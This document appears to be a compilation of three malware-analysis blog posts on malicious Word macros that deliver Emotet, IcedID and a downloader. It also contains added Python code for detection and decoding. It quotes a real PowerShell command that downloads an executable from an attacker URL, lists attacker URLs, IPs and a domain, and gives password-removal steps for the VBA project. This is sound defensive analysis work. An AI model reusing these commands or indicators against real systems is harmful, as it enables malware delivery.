Word Document Malware Analysis

MD5: CA15F9F45971EA442943084547761994

File: Microsoft Word document

Word Document Screenshot:

File Properties:

I used olevba.py to extract the VBA code, but it was giving an error, so I used the oledump.py tool to analyze the file.

Using oledump.py, I ran the command below to get the complete list of document streams.

>>oledump.py <filename>

You can see an M next to streams 18 and 19, which marks the VBA macros: as explained by Didier Stevens, the author of this Python script, M denotes a stream containing VBA macros.

So the next command I run is:

>>oledump.py -s 18 <filename>

In the screenshot below, it can be seen that the module Lev1daeyfvl calls S_gil0c35zh248.Mei497ecvshp on Document_Open().

After looking into it more, I found that S_gil0c35zh248.Mei497ecvshp, which is called on document open, is a user form (see the screenshot below).

S_gil0c35zh248.Mei497ecvshp is a user form

I opened the Word document and navigated to the VBA developer tool (Alt + F11). I saw that the VBA code executes when the form runs.

Next I debugged the code and analysed its behavior.

The VBA code that runs on document open executes the PowerShell script through the WMI process.
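
The WMI-brokered launch described above is worth a detection note: when a macro starts PowerShell through WMI, the parent of powershell.exe is the WMI provider host (WmiPrvSE.exe), not WINWORD.EXE, so a plain parent/child rule misses it. The Python below is an added example, not the post's own code: a small process-tree check over constructed process-creation events. The event field names are assumptions loosely modelled on Sysmon Event ID 1, and the handling of -EncodedCommand prefixes is mine.

```python
"""Flag Office -> script-host launches, including the WMI-brokered variant.

Added example, not the post's own code. The events below are
constructed; the field names are assumptions, not any product's schema.
"""
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...),
# so match every prefix as a whole token.
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(1, 15))
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:" + _PREFIXES + r")(?=\s|$)")

# Constructed sample events: pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": '"WINWORD.EXE" invoice.doc'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c echo test"},
    {"pid": 300, "ppid": 1,   "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k DcomLaunch"},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmd": "WmiPrvSE.exe"},
    {"pid": 320, "ppid": 310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -enc ZQBjAGgAbwAgAGgAaQA="},   # "echo hi", UTF-16LE
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\admin\\backup.ps1"},  # benign-looking
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert per suspicious process-creation event."""
    by_pid = {e["pid"]: e for e in events}
    office_alive = any(_basename(e["image"]) in OFFICE_IMAGES for e in events)
    alerts = []
    for e in events:
        child = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = _basename(parent["image"]) if parent else ""
        if parent_name in OFFICE_IMAGES and child in SCRIPT_HOSTS:
            # The direct case: Word itself is the parent of the script host.
            alerts.append({"pid": e["pid"], "rule": "office_spawned_script_host", "parent": parent_name})
        elif (parent_name == "wmiprvse.exe" and child in ("powershell.exe", "pwsh.exe")
              and ENCODED_FLAG.search(e["cmd"])):
            # WMI hides the real initiator; record whether an Office process exists to correlate with.
            alerts.append({"pid": e["pid"], "rule": "wmi_spawned_encoded_powershell",
                           "parent": parent_name, "office_process_on_host": office_alive})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Run as-is it reports pid 210 (Word spawning cmd.exe) and pid 320 (WmiPrvSE.exe spawning PowerShell with an encoded command) and stays quiet on the PowerShell started from Explorer.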

I extracted the PowerShell script, which is base64-encoded, by adding code that copies the PowerShell script into a text file. Below is the code used to extract the PowerShell script.

M2lujl629fpjn holds the PowerShell script
Base64-encoded PowerShell script

I decoded the PowerShell script and got the code below.

To decode the PowerShell script, I used the PowerShell script below.

# Read the base64 blob copied out of the macro; -Raw keeps it as a single string
$b64_string = (Get-Content -Path "C:\output\output.txt" -Raw).Trim()
# Decode as UTF-8. If the blob was passed to powershell.exe via -EncodedCommand, use [System.Text.Encoding]::Unicode (UTF-16LE) instead
$decoded_b64_string = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64_string))
# Write the decoded script out; -Force lets the script be re-run if the file already exists
New-Item "C:\output\decoded_b64.txt" -ItemType File -Force | Out-Null
Set-Content -Path "C:\output\decoded_b64.txt" -Value $decoded_b64_string
Write-Host "Decoded Base64 successfully"
Decoded PowerShell script

While debugging the decoded PowerShell script, I found that it creates a folder at the location below, and that the file it is going to write is Ws1uczsw.exe:

C:\Users\IEUser\AppData\Local\Temp\Word\2019\Ws1uczsw.exe

and there are multiple remote URLs from which it tries to download the malicious file.

All URLs are active.
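
Decoding the blob and pulling the drop path and download URLs out of it can be done in one offline step. The Python below is an added example, not the post's own code: the stand-in script it encodes is constructed (same shape as the payload described above, but with example.com/example.org URLs), and the UTF-16LE check is there because powershell.exe -EncodedCommand uses that encoding, whereas the post's one-liner decodes as UTF-8.

```python
"""Decode a base64 PowerShell payload and extract indicators from it.

Added example, not the post's own code. SAMPLE_SCRIPT is a harmless
constructed stand-in; its URLs and the drop path are not the real
sample's indicators.
"""
import base64
import re

URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.I)
# Windows path ending in .exe, e.g. C:\Users\...\Ws1uczsw.exe
EXE_PATH_RE = re.compile(r"[A-Za-z]:\\(?:[^\\\s'\"]+\\)*[^\\\s'\"]+\.exe", re.I)


def decode_powershell_b64(blob: str) -> str:
    """Decode a base64 blob of PowerShell, detecting UTF-16LE (-EncodedCommand) vs UTF-8."""
    raw = base64.b64decode("".join(blob.split()))
    # UTF-16LE text made of ASCII characters has a NUL in every odd byte.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def defang(url: str) -> str:
    """Rewrite http://host.tld/path as hxxp://host[.]tld/path so the indicator is not clickable."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def extract_iocs(script: str) -> dict:
    """Pull download URLs (defanged) and .exe drop paths out of decoded script text."""
    return {"urls": [defang(u) for u in URL_RE.findall(script)],
            "drop_paths": EXE_PATH_RE.findall(script)}


def triage(blob: str) -> dict:
    """Decode, then extract indicators: the step that follows the post's decoding one-liner."""
    script = decode_powershell_b64(blob)
    return {"script": script, **extract_iocs(script)}


# Constructed stand-in script: same shape as the decoded payload, not the sample's code.
SAMPLE_SCRIPT = (
    "$f = 'C:\\Users\\IEUser\\AppData\\Local\\Temp\\Word\\2019\\Ws1uczsw.exe'; "
    "New-Item -ItemType Directory -Force (Split-Path $f) | Out-Null; "
    "$urls = 'http://example.com/a/1', 'http://example.org/b/2'; "
    "foreach ($u in $urls) { try { (New-Object Net.WebClient).DownloadFile($u, $f); break } catch {} }"
)
ENCODED_UTF16 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()  # -EncodedCommand form
ENCODED_UTF8 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode()       # form the post decoded

if __name__ == "__main__":
    for blob in (ENCODED_UTF16, ENCODED_UTF8):
        result = triage(blob)
        print(result["urls"], result["drop_paths"])
```

Both encodings of the stand-in decode to the same script and yield the same two defanged URLs and one drop path; feeding a real blob through triage() gives the list that the URL table below was built from.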

URL (each linked to its VT Score in the original post)
http://rickthewelder[.]com/dtbkup20110205/i/8/79
http://stiecgps[.]com[.]br/cgi-bin/7/0/79
http://tfbauru[.]com[.]br/cgi-bin/Lhe/14/79
https://paulburkphotography[.]com/_new_images/F/9/79
http://theeldestgeek[.]com/error/F55/79
http://uniquewv[.]com/cgi-bin/OVJ9qY/12/79
http://tuls[.]pl/cgi-bin/7a99/79

When I executed the PowerShell script, it downloaded Ww1uczsw.exe

Downloaded file details:

MD5: A4513379DAD5233AFA402CC56A8B9222

File Type: Win32 Exe

PEid Packer: Microsoft Visual C++ v7.0

Family: Emotet Trojan

Summary:

  • The Word document has VBA macros which execute on document open.
  • The PowerShell script is base64-encoded and, when executed, downloads the Emotet Trojan executable.
  • Multiple URLs are used in the code as download sources for the malware.

Download Sample Link

References:

Word Macro Drops IcedID Trojan – Malware Analysis

HASH

MD5: 4A88E83B325AA23DA1E4BFA90B4F7C34

File type: Office Open XML Document

VT Score: 45/62

While I was going through the Any.run report tracker, I came across this Word document and downloaded it for analysis.

Word document screenshot

OleTools:

I used OLETools to analyse the document macros.

>>olevba.py -a <file name>

Indicators:

  • Auto-executes on document open.
  • May write a file to the system.
  • Base64-obfuscated strings.

I deobfuscated the file using olevba.py:

>>olevba.py --deobf <file name>

Indicators of Compromise:

  • PFSDNKDF.exe executable file name.

The code above shows that the PE file PFSDNKDF.exe will be dropped at C:\1\Whole\.

Next I started debugging the macro in the VBA development tool, which can be opened by pressing Alt + F11.

I can see that the variable hextostr holds a hex string that will be converted into the PE file.

Then it creates a process and executes the PFSDNKDF.exe file.

After that it closes the document, or prompts to save the changes if any changes have been made to the document.

Process Monitor capture of the exe being written to the path C:\1\Whole
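
The hextostr-to-PE conversion can be reproduced offline, so the dropped file can be hashed and checked without ever letting the macro run. The Python below is an added example, not the post's code; its hex blob is a constructed 72-byte DOS header plus PE signature, not PFSDNKDF.exe, and the clean-up of VBA string concatenation ("..." & _ across lines) is an assumption about how such blobs are usually split up in macro source.

```python
"""Recover a PE from a VBA hex-string blob offline and verify it.

Added example, not the post's own code. The blob below is constructed
(a 64-byte DOS header whose e_lfanew points at a minimal PE signature),
not PFSDNKDF.exe.
"""
import hashlib
import re
import struct


def vba_hex_to_bytes(text: str) -> bytes:
    """Strip VBA string plumbing (quotes, '&' joins, '_' continuations, whitespace,
    &H/0x prefixes) and convert what is left from hex. Assumes no further XOR layer."""
    cleaned = re.sub(r'&H|0x|["&_\s]', "", text, flags=re.I)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", cleaned):
        raise ValueError("not a clean hex string")
    return bytes.fromhex(cleaned)


def looks_like_pe(data: bytes) -> bool:
    """True if data has the DOS 'MZ' stub and 'PE\\0\\0' at the e_lfanew offset (stored at 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve(text: str) -> dict:
    """Decode, check and hash the embedded file without writing or running it."""
    data = vba_hex_to_bytes(text)
    return {"size": len(data), "is_pe": looks_like_pe(data),
            "md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}


# Constructed sample: DOS header with e_lfanew = 0x40, then 'PE\0\0' and an i386 COFF machine id.
_SAMPLE_BYTES = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
                 + b"PE\x00\x00" + struct.pack("<HH", 0x14C, 0))
_HEX = _SAMPLE_BYTES.hex()
# Laid out the way a macro would keep it:  hextostr = "..." & _ <newline> "..." & _ ...
SAMPLE_VBA_HEX = " & _\n".join('"%s"' % _HEX[i:i + 32] for i in range(0, len(_HEX), 32))

if __name__ == "__main__":
    print(carve(SAMPLE_VBA_HEX))
```

The is_pe flag is the check worth keeping: a blob that decodes cleanly but fails it (for instance one that starts with "<html>") is not a Windows executable at all, which is exactly the situation the third write-up below runs into.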

Dropped File:

MD5: 4C9C6B5B6DAA25B8DC274DD78FBC1AAA

File Name: psisdecd.dll

File Type: Win32 EXE

Signature: Microsoft Visual C++ 8

Family: IcedID

VT score: 56/72

IcedID is a banking Trojan that attackers use to steal victims' banking credentials. IcedID, aka BokBot, mainly targets businesses and steals payment information; it also acts as a loader and can deliver other malware or download additional modules.

Using Wireshark, I saw this executable create network connections to the IPs below, and DNS resolve the following domain:

SN   IP
1    40.90.189.152
2    125.252.219.233
3    104.84.156.5
4    104.116.46.155
5    104.244.42.131
6    184.29.89.6
7    23.50.81.26
8    104.116.25.27
9    184.29.89.6
10   23.54.56.6
11   104.244.42.42
12   104.244.42.195

IP addresses contacted by the malicious executable, with data sent and received.

SN   DNS                 Link
1    connuwedro.xyz      VT Score

URLs contacted by the malicious executable.

Summary:

  • The Word document drops the executable PFSDNKDF.exe on document open.
  • The dropped file is the IcedID Trojan.

Download sample: Any.Run

Read more about IcedID

Word Macro Malware Analysis

SHA256: dd81d70fa14f0e95b8cd2fe86a9a21a264cbb4bb32d80c4195fc13ee6791b994

Sample Link: Beta.VirusBay.io

File Type: Microsoft Word

File Extension: .doc

VirusTotal Score 29/61

I am going to use OLETools to analyse this Word document sample. For initial document analysis I rely on this tool; if you have read my earlier blog posts on Word macro analysis, you will have seen me use it.

>>oleid.py <word document file>

Word document property
>>olevba.py -a <word document file>
VBA macro analysis

VBA macro analysis:

  • The macro will execute on document open.
  • It may open/write a binary file on the system.
  • It has hex strings.
  • It has base64-obfuscated strings.

I can decode the base64-obfuscated strings using the olevba command

>>olevba.py --decode <word document file>

but instead I will open the VBA developer tool and debug the VBA code.

To view macros navigate to View >> Macros >> View Macros

Macro window

There is no macro available to step into because the macro project is password protected.

Open the VBA developer tool by pressing Alt+F11.

To remove the password, I will use code written by ndthanh; the link to the code is here: Github

To use this code, right-click on the Project >> Insert >> Module. This opens an empty code window; paste the code there.

Click Run >> (Macro Name) unprotected,

and the password is removed and the project is unlocked.

Document_Open() executes on opening word document.

The VBA project has forms and modules.

Forms

  • pfoi23hj
  • roihwo23

Macro Modules

  • ajbhk3h43
  • bcsjw
  • bklern4jh

CommandButton1() is auto-executed.

I set a breakpoint, started debugging the modules, and got the list of URLs it tries to connect to.

The URLs are stored as base64-obfuscated strings.

Obfuscated base64 URL strings

  • aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n
  • aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=
  • aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==
  • aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n
  • aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=
  • aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==

Decoded base64 URLs (each linked to its VT Score in the original post)

http://salwadm[.]com/tcphx/8888888.png
http://flipkenya[.]com/nujazbwrhjy/8888888.png
http://10x45[.]com/zfbjvvqxktx/8888888.png
http://iamployed[.]nl/lbbiujdyjy/8888888.png
http://aptociudadamuralladacartagena[.]com/gddqez/8888888.png
http://autoescolaciganos[.]com[.]br/gezzf/8888888.png

The code also drops a BAT file, tmp.bat, and executes it to create a directory tmpdir at C:\Users\Public\.

Location C:\Users\Public where the bat file is dropped

Next, the code deobfuscates a string by replacing each letter with its preceding letter, e.g. 'Q' is replaced with 'P'.

PowerShell command

Below is the PowerShell command with the obfuscated strings:

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')

Deobfuscated base64 strings:

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('http://salwadm . com/tcphx/8888888.png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e')
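
Both obfuscation layers described above (the base64 literals wrapped in FromBase64String, the '1' + '.e' + 'x' + 'e' concatenation, and the letter shift where 'Q' becomes 'P') can be peeled off without executing anything. The Python below is an added example, not the post's code: it works on the command line quoted above; because the post does not show which string the letter shift was applied to, the input 'Qpxfstifmm' is constructed, and the wrap-around of 'A' to 'Z' and the defanging of the recovered URL are my choices.

```python
"""Peel the string-obfuscation layers off the PowerShell download command.

Added example, not from the original post. COMMAND is the command line
quoted in the post; the letter-shift input used in the usage below is
constructed, and 'A' wrapping to 'Z' is an assumption.
"""
import base64
import re

# [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('...'))
WRAPPED_B64 = re.compile(
    r"\[System\.Text\.Encoding\]::ASCII\.GetString\("
    r"\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)\)")
# chains of quoted literals joined with +, e.g. 'file' + '1' + '.e' + 'x' + 'e'
STR_CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
DOWNLOAD_ARGS = re.compile(r"DownloadFile\('([^']*)',\s*'([^']*)'\)")

# Command line quoted in the post (obfuscated form).
COMMAND = '''powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')'''


def shift_back(s: str) -> str:
    """Replace each letter with its preceding letter ('Q' -> 'P'); 'A'/'a' wrap to 'Z'/'z' (assumption)."""
    out = []
    for ch in s:
        if "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") - 1) % 26 + ord("A")))
        elif "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") - 1) % 26 + ord("a")))
        else:
            out.append(ch)
    return "".join(out)


def defang(url: str) -> str:
    """hxxp://host[.]tld/path so the recovered indicator is not clickable."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def fold_concat(cmd: str) -> str:
    """Join 'a' + 'b' + 'c' into 'abc' so split-up file names become readable."""
    return STR_CONCAT.sub(lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", cmd)


def peel(cmd: str) -> dict:
    """Decode every wrapped base64 literal, fold concatenations, then read the DownloadFile arguments."""
    plain = WRAPPED_B64.sub(lambda m: "'" + base64.b64decode(m.group(1)).decode("ascii") + "'", cmd)
    plain = fold_concat(plain)
    url, path = DOWNLOAD_ARGS.search(plain).groups()
    return {"url": defang(url), "drop_path": path, "command": plain.replace(url, defang(url))}


if __name__ == "__main__":
    print(peel(COMMAND))
    print(shift_back("Qpxfstifmm"))   # constructed input for the letter-shift layer
```

peel() returns the defanged download URL, the final drop path C:\Users\Public\tmpdir\file1.exe (the concatenated '1' + '.e' + 'x' + 'e' folded in), and the fully de-layered command; shift_back() turns the constructed 'Qpxfstifmm' into 'Powershell'.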

The PowerShell script downloads an executable file, file1.exe, from the URL. After taking a closer look at this file, it is an HTML page with a .exe extension.

File downloaded by PowerShell script

I uploaded this file to VirusTotal and there were zero detections as malware.

SHA256: 3b11440abf602e0ac35a8a1489ed26ec0103ed2ba636520761c698e5fb2df9d1

VirusTotal score link here

Summary:

  • On document open, the forms execute.
  • Drops a bat file which creates a folder on the victim's machine.
  • Executes a PowerShell script which downloads a file from one of multiple URLs.
  • Looks for antivirus protection and real-time protection values in the registry.